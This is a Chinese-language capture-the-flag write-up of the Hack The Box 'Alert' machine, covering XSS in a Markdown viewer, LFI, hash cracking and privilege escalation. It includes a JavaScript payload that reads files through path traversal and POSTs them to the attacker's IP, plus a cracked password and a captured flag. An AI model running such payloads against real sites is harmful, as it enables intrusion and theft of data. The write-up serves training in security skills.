Alert Writeup
- 250424: Fixed typos and released this writeup to the public.
不熟悉XSS,就會覺得難。
靶機資訊
| Machine | Description |
|---|---|
| Name | Blurry |
| OS | Linux |
| Difficulty | Easy |
| Author | FisMatHack |
情蒐 Recon
服務掃描
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDSrBVJEKTgtUohrzoK9i67CgzqLAxnhEsPmW8hS5CFFGYikUduAcNkKsmmgQI09Q+6pa+7YHsnxcerBnW0taI//IYB5TI/LSE3yUxyk/ROkKLXPNiNGUhC6QiCj3ZTvThyHrFD9ZTxWfZKEQTcOiPs15+HRPCZepPouRtREGwmJcvDal1ix8p/2/C8X57ekouEEpIk1wzDTG5AM2/D08gXXe0TP+KYEaZEzAKM/mQUAqNTxfjc9x5rlfPYW+50kTDwtyKta57tBkkRCnnns0YRnPNtt0AH374ZkYLcqpzxwN8iTNXaeVT/dGfF4mA1uW89hSMarmiRgRh20Y1KIaInHjv9YcvSlbWz+2sz3ev725d4IExQTvDR4sfUAdysIX/q1iNpleyRgM4cvDMjxD6lEKpvQYSWVlRoJwbUUnJqnmZXboRwzRl+V3XCUaABJrA/1K1gvJfsPcU5LX303CV6LDwvLJIcgXlEbtjhkcxz7b7CS78BEW9hPifCUDGKfUs=
| 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHYLF+puo27gFRX69GBeZJqCeHN3ps2BScsUhKoDV66yEPMOo/Sn588F/wqBnJxsPB3KSFH+kbYW2M6erFI3U5k=
| 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG/QUl3gapBOWCGEHplsOKe2NlWjlrb5vTTLjg6gMuGl
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://alert.htb/
12227/tcp filtered unknown no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ sudo nmap -p- -Pn --min-rate 6969 10.129.231.188
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 17:05 EST
Nmap scan report for 10.129.231.188
Host is up (0.085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
12227/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ sudo nmap -p22,80,12227 -sCV -vv 10.129.231.188
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 17:05 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:05
Completed NSE at 17:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:05
Completed NSE at 17:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:05
Completed NSE at 17:05, 0.00s elapsed
Initiating Ping Scan at 17:05
Scanning 10.129.231.188 [4 ports]
Completed Ping Scan at 17:05, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:05
Completed Parallel DNS resolution of 1 host. at 17:05, 0.00s elapsed
Initiating SYN Stealth Scan at 17:05
Scanning 10.129.231.188 [3 ports]
Discovered open port 22/tcp on 10.129.231.188
Discovered open port 80/tcp on 10.129.231.188
Completed SYN Stealth Scan at 17:05, 1.60s elapsed (3 total ports)
Initiating Service scan at 17:05
Scanning 2 services on 10.129.231.188
Completed Service scan at 17:06, 6.21s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.231.188.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 2.61s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 0.35s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 0.00s elapsed
Nmap scan report for 10.129.231.188
Host is up, received echo-reply ttl 63 (0.088s latency).
Scanned at 2024-12-04 17:05:55 EST for 11s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDSrBVJEKTgtUohrzoK9i67CgzqLAxnhEsPmW8hS5CFFGYikUduAcNkKsmmgQI09Q+6pa+7YHsnxcerBnW0taI//IYB5TI/LSE3yUxyk/ROkKLXPNiNGUhC6QiCj3ZTvThyHrFD9ZTxWfZKEQTcOiPs15+HRPCZepPouRtREGwmJcvDal1ix8p/2/C8X57ekouEEpIk1wzDTG5AM2/D08gXXe0TP+KYEaZEzAKM/mQUAqNTxfjc9x5rlfPYW+50kTDwtyKta57tBkkRCnnns0YRnPNtt0AH374ZkYLcqpzxwN8iTNXaeVT/dGfF4mA1uW89hSMarmiRgRh20Y1KIaInHjv9YcvSlbWz+2sz3ev725d4IExQTvDR4sfUAdysIX/q1iNpleyRgM4cvDMjxD6lEKpvQYSWVlRoJwbUUnJqnmZXboRwzRl+V3XCUaABJrA/1K1gvJfsPcU5LX303CV6LDwvLJIcgXlEbtjhkcxz7b7CS78BEW9hPifCUDGKfUs=
| 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHYLF+puo27gFRX69GBeZJqCeHN3ps2BScsUhKoDV66yEPMOo/Sn588F/wqBnJxsPB3KSFH+kbYW2M6erFI3U5k=
| 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG/QUl3gapBOWCGEHplsOKe2NlWjlrb5vTTLjg6gMuGl
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://alert.htb/
12227/tcp filtered unknown no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:06
Completed NSE at 17:06, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.12 seconds
Raw packets sent: 8 (328B) | Rcvd: 3 (116B)
掃完標的發現開啟三個port,分別是SSH、HTTP和不重要,系統是Debian,Web是用Apache反向代理服務,並把IP直連的流量導向:alert.htb,於是把域名加入到/etc/hosts中。
Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ echo "10.129.231.188 alert.htb" | sudo tee -a /etc/hosts
10.129.231.188 alert.htb
至於為什麼要將domain name加入至
/etc/hosts? 請參考另一篇中的解釋
HTTP - Port 80
連至首頁,發現架有一能將Markdown渲染(render)成HTML的服務。
但在測試該功能之前,我想先快速瀏覽其他頁面,於是在"About Us"頁得知:系統管理員將在24小時內回覆"Contact Us"的訊息。
要多包一層的XSS攻擊
如果管理者真的會讀取使用者送出的訊息話,我們可以嘗試XSS或是釣魚,所以先隨便輸入email和內文測試。
送出成功,但就如剛才所說,只單單的送出「純文字」沒有意義,目前先暫時推測標的背後有機器人(管理員)閱讀訊息,為了確認真的有「閱讀行為」,就必須讓它在開起訊息的瞬間,就立刻「通知」我方,能簡單辦到這點,當然是XSS了。
於是先在內文使用HTML插入架設於我方主機中的圖片,這樣就可以測試機器人開啟夾帶HTML的訊息後,有沒有把圖片渲染出來,如果有,我方就應該收到載取圖片的請求,這樣就可繼續後續XSS應用。
噫!中了!果然背後有機器人互動,在本地建立的HTTP Server看到從靶機發起讀取圖片的request。
測試XSS與失敗的原因
既然真的有人在收訊息,怎麼不嘗試XSS偷他的cookies?
結果失敗了,挾帶在onerror的後面的js沒有被執行,為什麼?
觀察HTTP Server紀錄:
Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.231.188 - - [08/Dec/2024 07:36:16] code 404, message File not found
10.129.231.188 - - [08/Dec/2024 07:36:16] "GET /QQ.png HTTP/1.1" 404 -
10.129.231.188 - - [08/Dec/2024 07:37:37] "GET /?c=%27+document.cookie> HTTP/1.1" 200 -
就紀錄的結果來看,/後面整段的js payload被當成route了,所以應該是機器人點了連結,XSS並沒有被觸發。
詳細點說白話文,剛才傳出去的訊息在機器人眼中應該看起來像是下面的樣子:
<img src=x onerrorr=this.src='http://10.10.14.21:8000/?c='+document.cookie>
最前面的<img>標籤沒有被渲染成圖片顯示,機器人看到的就是上方的那一段文字(<img src=...)和後面的連結(上方以超連結表示的部分),然後他點擊連結,導致我方收到GET /?c=%27+document.cookie>。
如果訊息內文中的<img src=x ...>的部分有成功渲染網頁的話,應該要看到一個壞掉的圖片,像是這樣:
⬆ 壞掉惹QQ
且XSS在讀取頁面後的瞬間觸發,我方應該收到/?c=<COOKIE>(如果沒有找到cookies,<COOKIE>的部分就是空白),而不是被 URL和HTML encoded後的結果/?c=%27+document.cookie> (%27是',>是>)。
那該怎麼辦? 沒怎麼辦,就先看看有沒有其他可以利用的弱點。
XSS in Markdown
還記得一開始發現首頁的功能嗎?這是一個把Markdown渲染成HTML的網站。
然後很多人不知道其實Markdown裡面可以插入HTML片段!
除了HTML之外,也可以加入CSS和JavaScript元素,如果瀏覽方沒有防禦,就可以觸發XSS。
先寫一個test.md測試,如果中XSS後,就會對我方POST,回傳目前頁面的HTML內容:
上傳。
點擊「View Markdown」,開啟渲染頁面。
結果在我方設備上監聽到自己觸發XSS回連的request,確定可以觸發。除此之外,在頁面的右下方取得目前頁面的連結,這剛好可以送給機器人點。
於是重新啟動nc、修改payload,送出連結,嘗試取得機器人看到的靶機首頁頁面,也許有其他功能。
記得要使用sudo啟動Port 80!
Linux系統保留1~1023的port,需要有root權限才可取用。
對了,我是不知道為什麼偷不到cookie,所以才轉而偷取它看到的頁面。
發現比起一般使用者,機器人(管理員)可以多取得「message」功能,所以也把功能導回來看看。
connect to [10.10.14.31] from (UNKNOWN) [10.129.93.216] 33870
POST / HTTP/1.1
Host: 10.10.14.31
Connection: keep-alive
Content-Length: 1012
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="css/style.css">
<title>Alert - Markdown Viewer</title>
</head>
<body>
<nav>
<a href="index.php?page=alert">Markdown Viewer</a>
<a href="index.php?page=contact">Contact Us</a>
<a href="index.php?page=about">About Us</a>
<a href="index.php?page=donate">Donate</a>
<a href="index.php?page=messages">Messages</a> </nav>
<div class="container">
<h1>Markdown Viewer</h1><div class="form-container">
<form action="visualizer.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" accept=".md" required>
<input type="submit" value="View Markdown">
</form>
</div> </div>
<footer>
<p style="color: black;">© 2024 Alert. All rights reserved.</p>
</footer>
</body>
</html>
在次修改test.md、上傳、重啟nc,然後送出連結。
發現「message」功能可取得2024-03-10_15-48-34.txt檔案,於是依樣畫葫蘆。
connect to [10.10.14.31] from (UNKNOWN) [10.129.93.216] 45268
POST / HTTP/1.1
Host: 10.10.14.31
Connection: keep-alive
Content-Length: 821
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://alert.htb
Referer: http://alert.htb/
Accept-Encoding: gzip, deflate
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="css/style.css">
<title>Alert - Markdown Viewer</title>
</head>
<body>
<nav>
<a href="index.php?page=alert">Markdown Viewer</a>
<a href="index.php?page=contact">Contact Us</a>
<a href="index.php?page=about">About Us</a>
<a href="index.php?page=donate">Donate</a>
<a href="index.php?page=messages">Messages</a> </nav>
<div class="container">
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>
</div>
<footer>
<p style="color: black;">© 2024 Alert. All rights reserved.</p>
</footer>
</body>
</html>
不知道為什麼2024-03-10_15-48-34.txt是空的,但這沒關係,因為/message.php?file=<FILE>可以LFI。
XSSLFI 讀取機敏資訊
經過測試,發現/message.php?file=<FILE>具有LFI弱點,然後標的又是以Apache2架設,簡單上網搜尋就可以得到一些設定檔的位置。
<script>
(function() {
fetch('http://alert.htb/messages.php?file=../../../../../../../../etc/apache2/sites-enabled/000-default.conf', { mode: 'no-cors' })
.then(response => response.text())
.then(htmlSource => {
const xhr = new XMLHttpRequest();
xhr.open('POST', 'http://10.10.14.31', true);
xhr.send(htmlSource);
});
})();
</script>
讀取/etc/apache2/sites-enabled/000-default.conf以查看vHost設定,得知有第二站點:「statistics.alert.htb」,於是也把它加入到/etc/hosts中。
仔細閱讀設定檔,得知需要通過驗證(33-36),才可以取得statistics.alert.htb網站,認證設定在/var/www/statistics.alert.htb/.htpasswd裡面(35),所以一樣手段,把.htpasswd檔案下載下來。
暴力破解Apache MD5
結果取得albert的密碼hash,於是使用hashcat嘗試字典檔暴力破解。
Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ hashcat -h | grep apr1
1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | FTP, HTTP, SMTP, LDAP Server
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ hashcat -a 0 -m 1600 albert.hash /usr/share/wordlists/rockyou-utf8.txt --username
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13900H, 2917/5899 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou-utf8.txt
* Passwords.: 14344392
* Bytes.....: 140056880
* Keyspace..: 14344374
* Runtime...: 1 sec
$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/:manchesterunited
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
Time.Started.....: Tue Dec 10 09:27:14 2024 (0 secs)
Time.Estimated...: Tue Dec 10 09:27:14 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou-utf8.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 6087 H/s (8.26ms) @ Accel:32 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2816/14344374 (0.02%)
Rejected.........: 0/2816 (0.00%)
Restore.Point....: 2688/14344374 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: my3kids -> medicina
Started: Tue Dec 10 09:26:48 2024
Stopped: Tue Dec 10 09:27:16 2024
順利破出密碼。
嘗試登入。
成功登入statistics.alert.htb網站。
但是沒有什麼用就是了。
SSH登入albert
拿到密碼就亂試,剛好可以登入SSH。
Terminal
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/alert]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-200-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Tue 10 Dec 2024 03:11:14 PM UTC
System load: 0.01
Usage of /: 62.3% of 5.03GB
Memory usage: 8%
Swap usage: 0%
Processes: 241
Users logged in: 0
IPv4 address for eth0: 10.129.93.216
IPv6 address for eth0: dead:beef::250:56ff:feb9:88b8
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Nov 19 14:19:09 2024 from 10.10.14.23
albert@alert:/opt/website-monitor$ id
uid=1000(albert) gid=1000(albert) groups=1000(albert),1001(management)
albert@alert:~$ cat user.txt
38d7a78e76b2d5e68ff340673c6e9640
內部情蒐 - 程序詳列
詳列目前執行的程式,過濾掉一些不重要的程序,可以得知機器人被週期性的喚醒,去點連結,腳本內容就不提了,超級出戲的。
把注意力集中在 root 執行的/usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor就好。
Terminal
albert@alert:~$ ps -ef
UID PID PPID C STIME TTY TIME CMD
...
root 976 1 0 13:28 ? 00:00:00 /usr/sbin/cron -f
root 985 976 0 13:28 ? 00:00:00 /usr/sbin/CRON -f
root 986 976 0 13:28 ? 00:00:00 /usr/sbin/CRON -f
root 991 985 0 13:28 ? 00:00:00 /bin/sh -c /root/scripts/php_bot.sh
root 992 1 0 13:28 ? 00:00:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
root 993 986 0 13:28 ? 00:00:00 /bin/sh -c /root/scripts/xss_bot.sh
root 994 993 0 13:28 ? 00:00:00 /bin/bash /root/scripts/xss_bot.sh
root 997 994 0 13:28 ? 00:00:00 inotifywait -m -e create --format %w%f %e /var/www/alert.htb/messages --exclude 2024-03-10_15-48-34.txt
root 998 994 0 13:28 ? 00:00:00 /bin/bash /root/scripts/xss_bot.sh
root 999 1 0 13:28 ? 00:00:04 /usr/bin/python3 /usr/bin/fail2ban-server -xf start
daemon 1000 1 0 13:28 ? 00:00:00 /usr/sbin/atd -f
root 1001 1 0 13:28 ? 00:00:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 1026 1 0 13:28 tty1 00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1027 991 0 13:28 ? 00:00:00 /bin/bash /root/scripts/php_bot.sh
root 1028 1027 0 13:28 ? 00:00:00 inotifywait -m -e modify --format %w%f %e /opt/website-monitor/config
root 1029 1027 0 13:28 ? 00:00:00 /bin/bash /root/scripts/php_bot.sh
root 1030 1 0 13:28 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 1033 1030 0 13:28 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 1034 1030 0 13:28 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 1035 1030 0 13:28 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 1036 1030 0 13:28 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 1037 1030 0 13:28 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 1131 1030 0 13:31 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 1132 1030 0 13:31 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 1133 1030 0 13:31 ? 00:00:00 /usr/sbin/apache2 -k start
root 1479 2 0 13:39 ? 00:00:00 [kworker/0:0-events]
root 1693 2 0 13:44 ? 00:00:03 [kworker/1:0-events]
root 2971 2 0 14:34 ? 00:00:00 [kworker/u256:0-events_unbound]
root 3073 2 0 14:39 ? 00:00:00 [kworker/1:2-rcu_par_gp]
root 3280 2 0 15:05 ? 00:00:00 [kworker/u256:1-events_unbound]
root 3368 2 0 15:09 ? 00:00:00 [kworker/1:1-events]
root 3371 2 0 15:09 ? 00:00:00 [kworker/0:2-events]
root 3418 1001 0 15:11 ? 00:00:00 sshd: albert [priv]
albert 3439 1 0 15:11 ? 00:00:00 /lib/systemd/systemd --user
albert 3440 3439 0 15:11 ? 00:00:00 (sd-pam)
root 3446 2 0 15:11 ? 00:00:00 [kworker/0:3]
albert 3569 3418 0 15:11 ? 00:00:00 sshd: albert@pts/0
albert 3570 3569 0 15:11 pts/0 00:00:00 -bash
albert 3595 3570 0 15:12 pts/0 00:00:00 ps -ef
竄改系統執行PHP檔
根據剛才得知的資訊,到/opt/website-monitor看看php載入了什麼模組。
發現config目錄是目前唯一可以寫入權限的地方(albert在management群組裡,在最起開始登入時,執行id得知),於是進入看看裡面有什麼。
Terminal
albert@alert:~$ ls -alh /opt/website-monitor
total 96K
drwxrwxr-x 7 root root 4.0K Oct 12 01:07 .
drwxr-xr-x 4 root root 4.0K Oct 12 00:58 ..
drwxrwxr-x 2 root management 4.0K Oct 12 04:17 config
drwxrwxr-x 8 root root 4.0K Oct 12 00:58 .git
drwxrwxr-x 2 root root 4.0K Oct 12 00:58 incidents
-rwxrwxr-x 1 root root 5.2K Oct 12 01:00 index.php
-rwxrwxr-x 1 root root 1.1K Oct 12 00:58 LICENSE
-rwxrwxr-x 1 root root 1.5K Oct 12 01:00 monitor.php
drwxrwxrwx 2 root root 4.0K Oct 12 01:07 monitors
-rwxrwxr-x 1 root root 104 Oct 12 01:07 monitors.json
-rwxrwxr-x 1 root root 40K Oct 12 00:58 Parsedown.php
-rwxrwxr-x 1 root root 1.7K Oct 12 00:58 README.md
-rwxrwxr-x 1 root root 1.9K Oct 12 00:58 style.css
drwxrwxr-x 2 root root 4.0K Oct 12 00:58 updates
albert@alert:~$ cd /opt/websit*
albert@alert:/opt/website-monitor$ ll config/
total 12
drwxrwxr-x 2 root management 4096 Oct 12 04:17 ./
drwxrwxr-x 7 root root 4096 Oct 12 01:07 ../
-rwxrwxr-x 1 root management 49 Nov 5 14:31 configuration.php*
發現只有一份configuration.php設定php檔,而且目前權限可以修改。
外加該檔案還被index.php載入,index.php又會被 root 執行的php載起來,所以只要加入reverse shell到configuration.php裡面,等回連就好。
albert@alert:/opt/website-monitor$ cat index.php
<?php
include('config/configuration.php');
include(PATH.'/Parsedown.php');
...
Rooted
Last update:
2025-04-24
Created:
2024-12-12